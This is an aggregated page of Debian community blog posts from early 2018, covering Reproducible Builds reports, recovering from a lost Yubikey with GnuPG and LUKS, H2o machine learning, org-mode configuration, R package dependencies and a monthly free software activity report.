  • Ole Streicher (1)
  • Sebastien KALT (1)
  • Thorsten Glaser (1)
Misc.

This week's edition was written by Bernhard M. Wiedemann, Chris Lamb & Holger Levsen & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Reproducible builds folks https://reproducible.alioth.debian.org/blog/ Reproducible builds blog

Replacing a lost Yubikey

Wed, 14/03/2018 - 7:05am

Some weeks ago I lost my purse with everything in there, from my residency card, driving license, credit cards, cash cards, and all kinds of ID cards, to, last but not least, my Yubikey NEO. Being in Japan, I did expect that the purse would show up in a few days, most probably with the money gone but all the cards intact. Unfortunately, not this time. So after having finally reissued most of the cards, I also went through the necessary procedures concerning the Yubikey, which contained my GnuPG subkeys and was used as a second factor for several services (see here and here).

Although the GnuPG keys on the Yubikey are considered safe from extraction, I still decided to revoke them and create new subkeys – one of the big advantages of subkeys: one does not start at zero but just creates new subkeys instead of running around trying to get signatures again.

Another thing that had to be done was removing the old Yubikey from all the services where it had been used as a second factor. In my case that was quite a lot (Google, GitHub, Dropbox, NextCloud, WordPress, …). BTW, you do have a set of backup keys saved somewhere for all the services you are using, right? It helps a lot when getting back into the system.

GnuPG keys renewal

To remind myself of what is necessary, here are the steps:

  • Get your master key from the backup USB stick
  • revoke the three subkeys that are on the Yubikey
  • create new subkeys
  • install the new subkeys onto a new Yubikey, update keyservers

All of that is quite straightforward: use gpg --expert --edit-key YOUR_KEY_ID; after this you select a subkey with key N, followed by revkey. You can select all three subkeys and revoke them at the same time: just type key N for each of the subkeys (where N is the index of the key, starting from 0).

Next create new subkeys, here you can follow the steps laid out in the original blog. In the same way you can move them to a new Yubikey Neo (good that I bought three of them back then!).

Last but not least you have to update the key-servers with your new public key, which is normally done with gpg --send-keys (again see the original blog).

The most tricky part was setting up and distributing the keys on my various computers: The master key remains as usual on offline media only. On my main desktop at home I have the subkeys available, while on my laptop I only have stubs pointing at the Yubikey. This needs a bit of shuffling around, but should be obvious somehow when looking at the previous blogs.

Full disk encryption

I had my Yubikey also registered as unlock device for the LUKS based full disk encryption. The status before the update was as follows:

$ cryptsetup luksDump /dev/sdaN
Version:       1
Cipher name:   aes
....
Key Slot 0: ENABLED
  ...
Key Slot 1: DISABLED
Key Slot 2: DISABLED
Key Slot 3: DISABLED
Key Slot 4: DISABLED
Key Slot 5: DISABLED
Key Slot 6: DISABLED
Key Slot 7: ENABLED
  ...

I thought that the slot for the old Yubikey was slot 7, but I wasn't completely sure. So I first registered the new Yubikey in slot 6 with

yubikey-luks-enroll -s 6 -d /dev/sdaN

and checked that I can unlock during boot using the new Yubikey. Then I cleared the slot information in slot 7 with

cryptsetup luksKillSlot /dev/sdaN 7

and again made sure that I can boot using my passphrase (in slot 0) and the new Yubikey (in slot 6).

TOTP/U2F second factor authentication

The last step was re-registering the new Yubikey with all the favorite services as second factor, removing the old key on the way. In my case the list comprises several WordPress sites, GitHub, Google, NextCloud, Dropbox and what else I have forgotten.

Although this is nearly the worst-case scenario (OK, the main key was not compromised!), everything went very smoothly and easily, to my big surprise. Even my Debian upload ability was not interrupted considerably. All in all, it shows that having subkeys on a Yubikey is a very useful and effective solution.

Norbert Preining https://www.preining.info/blog There and back again

Playing with water

Wed, 14/03/2018 - 5:00am

I'm currently taking a machine learning class and although it is an insane amount of work, I like it a lot. I initially had planned to use R to play around with the database I have, but the teacher recommended I use H2o, a FOSS machine learning framework.

I was a bit sceptical at first since I'm already pretty good with R, but then I found out you could simply import H2o as an R library. H2o replaces most R functions by its own parallelized ones to cut down on processing time (no more doParallel calls) and uses an "external" server you have to run on the side instead of running R calls directly.
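For readers curious what that client/server split looks like in practice, here is a minimal sketch using the Python bindings (the R package follows the same pattern; the CSV path is a placeholder):

# Minimal sketch, assuming the h2o package is installed: the client starts
# (or attaches to) the external H2O JVM, and the heavy lifting then happens
# server-side while you drive it from Python or R.
import h2o

h2o.init()                                   # start or connect to the H2O server
frame = h2o.import_file("my_database.csv")   # placeholder path
frame.describe()                             # summary computed by the server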

I was pretty happy with this situation, that is until I actually started using H2o in R. With the huge database I'm playing with, the library felt clunky and I had a hard time doing anything useful. Most of the time, I just ended up with long Java traceback calls. Much love.

I'm sure in the right hands using H2o as a library could have been incredibly powerful, but sadly it seems I haven't earned my black belt in R-fu yet.

I was pissed for at least a whole day - not being able to achieve what I wanted to do - until I realised H2o comes with a WebUI called Flow. I'm normally not very fond of using web thingies to do important work like writing code, but Flow is simply incredible.

Automated graphing functions, an integrated ETA when running resource-intensive models, descriptions for each and every model parameter (the parameters are even divided into sections based on your familiarity with the statistical models in question), Flow seemingly has it all. In no time I was able to run 3 basic machine learning models and get actual interpretable results.

So yeah, if you've been itching to analyse very large databases using state of the art machine learning models, I would recommend using H2o. Try Flow at first instead of the Python or R hooks to see what it's capable of doing.

The only downside to all of this is that H2o is written in Java and depends on Java 1.7 to run... That, and be warned: it requires a metric fuckton of processing power and RAM. My poor server struggled quite a bit even with 10 available cores and 10Gb of RAM...

Louis-Philippe Véronneau https://veronneau.org/ Louis-Philippe Véronneau

Reproducible Builds: Weekly report #149

Wed, 07/03/2018 - 4:21am

Here's what happened in the Reproducible Builds effort between Sunday February 25 and Saturday March 3 2018:

diffoscope development

Version 91 was uploaded to unstable by Mattia Rizzolo. It included contributions already covered by posts of the previous weeks as well as new ones from:

In addition, Juliana — our Outreachy intern — continued her work on parallel processing; the above work is part of it.

reproducible-website development

Packages reviewed and fixed, and bugs filed

An issue with the pydoctor documentation generator was merged upstream.

Reviews of unreproducible packages

73 package reviews have been added, 37 have been updated and 26 have been removed in this week, adding to our knowledge about identified issues.

Weekly QA work

During our reproducibility testing, FTBFS bugs have been detected and reported by:

  • Adrian Bunk (46)
  • Jeremy Bicha (4)
Misc.

This week's edition was written by Chris Lamb, Mattia Rizzolo & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Reproducible builds folks https://reproducible.alioth.debian.org/blog/ Reproducible builds blog

Skellam distribution likelihood

Tue, 06/03/2018 - 10:37pm

I wondered if it was possible to make a ranking system based on the Skellam distribution, taking point spread as the only input; the first step is figuring out what the likelihood looks like, so here's an example for k=4 (i.e., one team beat the other by four goals):

It's pretty, but unfortunately, it shows that the most likely combination is µ1 = 0 and µ2 = 4, which isn't really that realistic. I don't know what I expected, though :-)
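For anyone who wants to reproduce the surface, here is a minimal sketch (not the author's code) using scipy's Skellam pmf; which mean belongs to which team depends on the sign convention, so the peak may appear mirrored relative to the plot described above:

# Evaluate the k = 4 Skellam likelihood on a (mu1, mu2) grid.
import numpy as np
from scipy.stats import skellam

k = 4
mu = np.linspace(0.01, 8, 200)
M1, M2 = np.meshgrid(mu, mu)
L = skellam.pmf(k, M1, M2)   # P(X1 - X2 = k) with X_i ~ Poisson(mu_i)
# L can now be handed to matplotlib's contourf/imshow to draw the surface.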

Perhaps it's different when we start summing many of them (more games, more teams), but you get into too high dimensionality to plot. If nothing else, it shows that it's hard to solve symbolically by looking for derivatives, as the extreme point is on an edge, not on a hill.

Steinar H. Gunderson http://blog.sesse.net/ Steinar H. Gunderson

Debian Bug Squashing Party in Tirana

Tue, 06/03/2018 - 10:15pm

On 3 March I attended a Debian Bug Squashing Party in Tirana, organized by colleagues at Open Labs Albania (Anisa and friends) and Daniel. Debian is the second-oldest GNU/Linux distribution still active and a launchpad for so many others.

A large number of participants from Kosovo took part, mostly female students. I chose to focus on adding Kosovo to country lists in Debian by verifying that Kosovo was missing and then filing bug reports or, even better, doing pull requests.

apt-cache rdepends iso-codes will return a list of packages that include ISO codes. However, this proved hard to examine by simply looking at these applications on Debian; one would have to search through their code to find out how the ISO 3166 codes are used. So I left that for another time.

I moved next to what I thought I would be able to complete within the event. Coding is becoming quite popular with children in Kosovo. I looked into MIT’s Scratch and Google’s Blockly, the second one being freer software and targeting younger children. They both work by snapping together logical building blocks into a program.

Translation of Blockly into Albanian is now complete and hopefully will get much use. You can improve on my work at Translatewiki.

Thank you for all the fish and see you at the next Debian BSP.

Arianit https://arianit2.wordpress.com debian – Arianit's Blog

Emacs #2: Introducing org-mode

Wed, 28/02/2018 - 11:09pm

In my first post in my series on Emacs, I described returning to Emacs after over a decade of vim, and org-mode being the reason why.

I really am astounded at the usefulness, and simplicity, of org-mode. It is really a killer app.

So what exactly is org-mode?

I wrote yesterday:

It’s an information organization platform. Its website says “Your life in plain text: Org mode is for keeping notes, maintaining TODO lists, planning projects, and authoring documents with a fast and effective plain-text system.”

That’s true, but doesn’t quite capture it. org-mode is a toolkit for you to organize things. It has reasonable out-of-the-box defaults, but it’s designed throughout for you to customize.

To highlight a few things:

  • Maintaining TODO lists: items can be scattered across org-mode files, contain attachments, have tags, deadlines, schedules. There is a convenient “agenda” view to show you what needs to be done. Items can repeat.
  • Authoring documents: org-mode has special features for generating HTML, LaTeX, slides (with LaTeX beamer), and all sorts of other formats. It also supports direct evaluation of code in-buffer and literate programming in virtually any Emacs-supported language. If you want to bend your mind on this stuff, read this article on literate devops. The entire Worg website is made with org-mode.
  • Keeping notes: yep, it can do that too. With full-text search, cross-referencing by file (as a wiki), by UUID, and even into other systems (into mu4e by Message-ID, into ERC logs, etc, etc.)

Getting started

I highly recommend watching Carsten Dominik’s excellent Google Talk on org-mode. It is an excellent introduction.

org-mode is included with Emacs, but you’ll often want a more recent version. Debian users can apt-get install org-mode, or it comes with the Emacs packaging system; M-x package-install RET org-mode RET may do it for you.

Now, you’ll probably want to start with the org-mode compact guide’s introduction section, noting in particular to set the keybindings mentioned in the activation section.

A good tutorial…

I’ve linked to a number of excellent tutorials and introductory items; this post is not going to serve as a tutorial. There are two good videos linked at the end of this post, in particular.

Some of my configuration

I’ll document some of my configuration here, and go into a bit of what it does. This isn’t necessarily because you’ll want to copy all of this verbatim — but just to give you a bit of an idea of some of what can be configured, an idea of what to look up in the manual, and maybe a reference for “now how do I do that?”

First, I set up Emacs to work in UTF-8 by default.

(prefer-coding-system 'utf-8)
(set-language-environment "UTF-8")

org-mode can follow URLs. By default, it opens in Firefox, but I use Chromium.

(setq browse-url-browser-function 'browse-url-chromium)

I set the basic key bindings as documented in the Guide, plus configure the M-RET behavior.

(global-set-key "\C-cl" 'org-store-link)
(global-set-key "\C-ca" 'org-agenda)
(global-set-key "\C-cc" 'org-capture)
(global-set-key "\C-cb" 'org-iswitchb)

(setq org-M-RET-may-split-line nil)

Configuration: Capturing

I can press C-c c from anywhere in Emacs. It will capture something for me, and include a link back to whatever I was working on.

You can define capture templates to set how this will work. I am going to keep two journal files for general notes about meetings, phone calls, etc. One for personal, one for work items. If I press C-c c j, then it will capture a personal item. The %a in all of these includes the link to where I was (or a link I had stored with C-c l).

(setq org-default-notes-file "~/org/tasks.org")
(setq org-capture-templates
      '(("t" "Todo" entry (file+headline "inbox.org" "Tasks")
         "* TODO %?\n %i\n %u\n %a")
        ("n" "Note/Data" entry (file+headline "inbox.org" "Notes/Data")
         "* %? \n %i\n %u\n %a")
        ("j" "Journal" entry (file+datetree "~/org/journal.org")
         "* %?\nEntered on %U\n %i\n %a")
        ("J" "Work-Journal" entry (file+datetree "~/org/wjournal.org")
         "* %?\nEntered on %U\n %i\n %a")))
(setq org-irc-link-to-logs t)

I like to link by UUIDs, which lets me move things between files without breaking locations. This helps generate UUIDs when I ask Org to store a link target for future insertion.


(require 'org-id)
(setq org-id-link-to-org-use-id 'create-if-interactive)

Configuration: agenda views

I like my week to start on a Sunday, and for org to note the time when I mark something as done.


(setq org-log-done 'time)
(setq org-agenda-start-on-weekday 0)

Configuration: files and refiling

Here I tell it what files to use in the agenda, and to add a few more to the plain text search. I like to keep a general inbox (from which I can move, or “refile”, content), and then separate tasks, journal, and knowledge base for personal and work items.

(setq org-agenda-files (list "~/org/inbox.org" "~/org/email.org"
                             "~/org/tasks.org" "~/org/wtasks.org"
                             "~/org/journal.org" "~/org/wjournal.org"
                             "~/org/kb.org" "~/org/wkb.org"))
(setq org-agenda-text-search-extra-files
      (list "~/org/someday.org" "~/org/config.org"))
(setq org-refile-targets '((nil :maxlevel . 2)
                           (org-agenda-files :maxlevel . 2)
                           ("~/org/someday.org" :maxlevel . 2)
                           ("~/org/templates.org" :maxlevel . 2)))
(setq org-outline-path-complete-in-steps nil) ; Refile in a single go
(setq org-refile-use-outline-path 'file)

Configuration: Appearance

I like a pretty screen. After you’ve gotten used to org a bit, you might try this.

(require 'org-bullets)
(add-hook 'org-mode-hook (lambda () (org-bullets-mode t)))
(setq org-ellipsis "⤵")

Coming up next…

This hopefully showed a few things that org-mode can do. Coming up next, I’ll cover how to customize TODO keywords and tags, archiving old tasks, forwarding emails to org-mode, and using git to synchronize between machines.

You can also see a list of all articles in this series.

Resources to accompany this article

John Goerzen http://changelog.complete.org The Changelog

#17: Dependencies.

Wed, 28/02/2018 - 10:45pm

Dependencies are invitations for other people to break your package.
-- Josh Ulrich, private communication

Welcome to the seventeenth post in the relentlessly random R ravings series of posts, or R4 for short.

Dependencies. A truly loaded topic.

As R users, we are spoiled. Early in the history of R, Kurt Hornik and Friedrich Leisch built support for packages right into R, and started the Comprehensive R Archive Network (CRAN). And R and CRAN have had a fantastic run. Roughly twenty years later, we are looking at over 12,000 packages which can (generally) be installed with absolute ease and no surprises. No other (relevant) open source language has anything of comparable rigour and quality. This is a big deal.

And coding practices evolved and changed to play to this advantage. Packages are a near-unanimous recommendation, use of the install.packages() and update.packages() tooling is nearly universal, and most R users have learned, to their advantage, to group code into interdependent packages. Obvious advantages are versioning and snapshotting, attached documentation in the form of help pages and vignettes, unit testing, and of course continuous integration as a side effect of the package build system.
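
For completeness, here is a minimal sketch of that tooling in action; the package chosen here is merely an example, not a recommendation from this post:

## install a package from CRAN ("digest" is only an example here)
install.packages("digest")
## bring every installed package up to date without prompting
update.packages(ask = FALSE)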

But the notion of 'oh, let me just build another package and add it to the pool of packages' can get carried away. A recent example I had was the work on the prrd package for parallel recursive dependency testing --- created, coincidentally, entirely to allow for easier voluntary tests I do on reverse dependencies for the packages I maintain. It uses a job queue, for which I relied on the liteq package by Gabor, which does the job: enqueue jobs, reliably dequeue them (also in parallel), and more. It looks light enough:

R> tools::package_dependencies(package="liteq", recursive=FALSE, db=AP)$liteq [1] "assertthat" "DBI" "rappdirs" "RSQLite" R>

Four dependencies in total: two because it uses an internal SQLite database, one for internal tooling, and one for configuration.

All good then? Not so fast. The devil here is the very innocuous and versatile RSQLite package because when we look at fully recursive dependencies all hell breaks loose:

R> tools::package_dependencies(package="liteq", recursive=TRUE, db=AP)$liteq [1] "assertthat" "DBI" "rappdirs" "RSQLite" "tools" [6] "methods" "bit64" "blob" "memoise" "pkgconfig" [11] "Rcpp" "BH" "plogr" "bit" "utils" [16] "stats" "tibble" "digest" "cli" "crayon" [21] "pillar" "rlang" "grDevices" "utf8" R> R> tools::package_dependencies(package="RSQLite", recursive=TRUE, db=AP)$RSQLite [1] "bit64" "blob" "DBI" "memoise" "methods" [6] "pkgconfig" "Rcpp" "BH" "plogr" "bit" [11] "utils" "stats" "tibble" "digest" "cli" [16] "crayon" "pillar" "rlang" "assertthat" "grDevices" [21] "utf8" "tools" R>

Now we went from four to twenty-four, due to the twenty-two dependencies pulled in by RSQLite.
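
To make that growth explicit, here is a small sketch (not part of the original analysis) that tabulates direct versus fully recursive dependency counts; it assumes AP holds the result of available.packages() as in the snippets above:

## Sketch: compare direct and fully recursive dependency counts.
## AP is assumed to be available.packages(), as used above.
if (!exists("AP")) AP <- available.packages()
pkgs   <- c("DBI", "RSQLite", "liteq")
direct <- tools::package_dependencies(pkgs, db = AP, recursive = FALSE)
recur  <- tools::package_dependencies(pkgs, db = AP, recursive = TRUE)
data.frame(package   = pkgs,
           direct    = lengths(direct[pkgs]),
           recursive = lengths(recur[pkgs]))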

There, my dear friend, lies madness. The moment one of these packages breaks, we get potential side effects. And this is no laughing matter. Here is a tweet from Kieran, posted days before a book deadline of his, when he was forced to roll a CRAN package back because it broke his entire setup. (The original tweet has by now been deleted; why people do that to their entire tweet histories is something I fail to comprehend too; in any case, the screenshot is from a private discussion I had with a few like-minded folks over Slack.)

That illustrates the quote by Josh at the top. As I too have "production code" (well, CRANberries for one relies on it), I was interested to see if we could easily amend RSQLite. And yes, we can. A quick fork and a few commits later, we have something we could call 'RSQLighter', as it reduces the dependencies quite a bit:

R> IP <- installed.packages()   # using my installed mod'ed version
R> tools::package_dependencies(package="RSQLite", recursive=TRUE, db=IP)$RSQLite
 [1] "bit64"     "DBI"       "methods"   "Rcpp"      "BH"        "bit"
 [7] "utils"     "stats"     "grDevices" "graphics"
R>

That is less than half. I have not proceeded with the fork because I do not believe in needlessly splitting codebases. But this could be a viable candidate for an alternate or shadow repository with more minimal and hence more robust dependencies. Or, as Josh calls it, the tinyverse.

Another maddening aspect of dependencies is the ruthless application of what we could jokingly call Metcalfe's Law: the likelihood of breakage does of course increase with the number of edges in the dependency graph. A nice illustration is this post by Jenny trying to rationalize why one of the 87 (as of today) tidyverse packages now has state "ORPHANED" at CRAN:

An invitation for other people to break your code. Well put indeed. Or to put rocks up your path.

But things are not all that dire. Most folks appear to understand the issue, some even do something about it. The DBI and RMySQL packages have saner strict dependencies, maybe one day things will improve for RMariaDB and RSQLite too:

R> tools::package_dependencies(package=c("DBI", "RMySQL", "RMariaDB"), recursive=TRUE, db=AP) $DBI [1] "methods" $RMySQL [1] "DBI" "methods" $RMariaDB [1] "bit64" "DBI" "hms" "methods" "Rcpp" "BH" [7] "plogr" "bit" "utils" "stats" "pkgconfig" "rlang" R>

And to be clear, I do not believe in giving up and using everything via Docker, or virtualenvs, or packrat, or ... A well-honed dependency system is wonderful and the right resource to get code deployed and updated. But it requires buy-in from everyone involved, and an understanding of the possible trade-offs. I think we can, and will, do better going forward.

Or else, there will always be the tinyverse ...

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Dirk Eddelbuettel http://dirk.eddelbuettel.com/blog Thinking inside the box

Free software activities in February 2018

Wed, 28/02/2018 - 7:36pm

Here is my monthly update covering what I have been doing in the free software world in February 2018 (previous month):

Reproducible builds

Whilst anyone can inspect the source code of free software for malicious flaws, most software is distributed pre-compiled to end users.

The motivation behind the Reproducible Builds effort is to allow verification that no flaws have been introduced — either maliciously or accidentally — during this compilation process by promising identical results are always generated from a given source, thus allowing multiple third-parties to come to a consensus on whether a build was compromised.

This month I:



I also made the following changes to diffoscope, our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues:

  • Add support for comparing Berkeley DB files. (Unfortunately this is currently incomplete because the libraries do not report metadata reliably!) (#890528)
  • Add support for comparing "XMLBeans" binary schemas. [...]
  • Drop spurious debugging code in Android tests. [...]


Debian

My activities as the current Debian Project Leader are covered in my "Bits from the DPL" email to the debian-devel-announce mailing list.

Patches contributed
  • debian-policy: Replace dh_systemd_install with dh_installsystemd. (#889167)
  • juce: Missing build-depends on graphviz. (#890035)
  • roffit: debian/rules does not override targets as intended. (#889975)
  • bugs.debian.org: Please add rel="canonical" to bug pages. (#890338)
Debian LTS

This month I have been paid to work 18 hours on Debian Long Term Support (LTS). In that time I did the following:

Uploads
  • redis:
    • 4.0.8-1 — New upstream release and fix a potential hardlink vulnerability.
    • 4.0.8-2 — Also listen on ::1 (IPv6) by default. (#891432)
  • python-django:
    • 1.11.10-1 — New upstream security release.
    • 2.0.2-1 — New upstream security release.
  • redisearch:
    • 1.0.6-1 — New upstream release.
    • 1.0.7-1 — New upstream release & add Lintian overrides for package-does-not-install-examples.
    • 1.0.8-1 — New upstream release, which includes my reproducibility-related improvement.
  • adminer:
    • 4.6.1-1 — New upstream release and override debian-watch-does-not-check-gpg-signature as upstream do not release signatures.
    • 4.6.2-1 — New upstream release.
  • process-cpp:
    • 3.0.1-3 — Make the documentation reproducible.
    • 3.0.1-4 — Correct Vcs-Bzr to Vcs-Git.
  • sleekxmpp (1.3.3-3) — Make the build reproducible. (#890193)
  • python-redis (2.10.6-2) — Correct autopkgtest dependencies and misc packaging updates.
  • bfs (1.2.1-1) — New upstream release.

I also made misc packaging updates for docbook-to-man (1:2.0.0-41), gunicorn (19.7.1-4), installation-birthday (8) & python-daiquiri (1.3.0-3).

Finally, I performed the following sponsored uploads: check-manifest (0.36-2), django-ipware (2.0.1-1), nose2 (0.7.3-3) & python-keyczar (0.716+ds-2).

Debian bugs filed
  • zsh: Please make apt install completion work on "local" files. (#891140)
  • git-gui: Ignores git hooks. (#891552)
  • python-coverage:
    • Installs pyfile.html into wrong directory breaking HTML report generation. (#890560)
    • Document copyright information for bundled JavaScript source. (#890578)
FTP Team

As a Debian FTP assistant I ACCEPTed 123 packages: apticron, aseba, atf-allwinner, bart-view, binutils, browserpass, bulk-media-downloader, ceph-deploy, colmap, core-specs-alpha-clojure, ctdconverter, debos, designate, editorconfig-core-py, essays1743, fis-gtm, flameshot, flex, fontmake, fonts-league-spartan, fonts-ubuntu, gcc-8, getdns, glyphslib, gnome-keyring, gnome-themes-extra, gnome-usage, golang-github-containerd-cgroups, golang-github-go-debos-fakemachine, golang-github-mattn-go-zglob, haskell-regex-tdfa-text, https-everywhere, ibm-3270, ignition-fuel-tools, impass, inetsim, jboss-bridger, jboss-threads, jsonrpc-glib, knot-resolver, libctl, liblouisutdml, libopenraw, libosmo-sccp, libtest-postgresql-perl, libtickit, linux, live-tasks, minidb, mithril, mutter, neuron, node-acorn-object-spread, node-babel, node-call-limit, node-color, node-colormin, node-console-group, node-consolidate, node-cosmiconfig, node-css-color-names, node-date-time, node-err-code, node-gulp-load-plugins, node-html-comment-regex, node-icss-utils, node-is-directory, node-mdn-data, node-mississippi, node-mutate-fs, node-node-localstorage, node-normalize-range, node-postcss-filter-plugins, node-postcss-load-options, node-postcss-load-plugins, node-postcss-minify-font-values, node-promise-retry, node-promzard, node-require-from-string, node-rollup, node-rollup-plugin-buble, node-ssri, node-validate-npm-package-name, node-vue-resource, ntpsec, nvidia-cuda-toolkit, nyx, pipsi, plasma-discover, pokemmo, pokemmo-installer, polymake, privacybadger, proxy-switcher, psautohint, purple-discord, pytest-astropy, pytest-doctestplus, pytest-openfiles, python-aiomeasures, python-coverage, python-fitbit, python-molotov, python-networkmanager, python-os-service-types, python-pluggy, python-stringtemplate3, python3-antlr3, qpack, quintuple, r-cran-animation, r-cran-clustergeneration, r-cran-phytools, re2, sat-templates, sfnt2woff-zopfli, sndio, thunar, uhd, undertime, usbauth-notifier, vmdb2 & xymonq.

I additionally filed 15 RC bugs against packages that had incomplete debian/copyright files against: browserpass, designate, fis-gtm, flex, gnome-keyring, ibm-3270, knot-resolver, libopenraw, libtest-postgresql-perl, mithril, mutter, ntpsec, plasma-discover, pytest-arraydiff & r-cran-animation.

Chris Lamb https://chris-lamb.co.uk/blog/category/planet-debian lamby: Items or syndication on Planet Debian.

Things that really matter

Wed, 28/02/2018 - 5:34pm


gwolf http://gwolf.org Gunnar Wolf
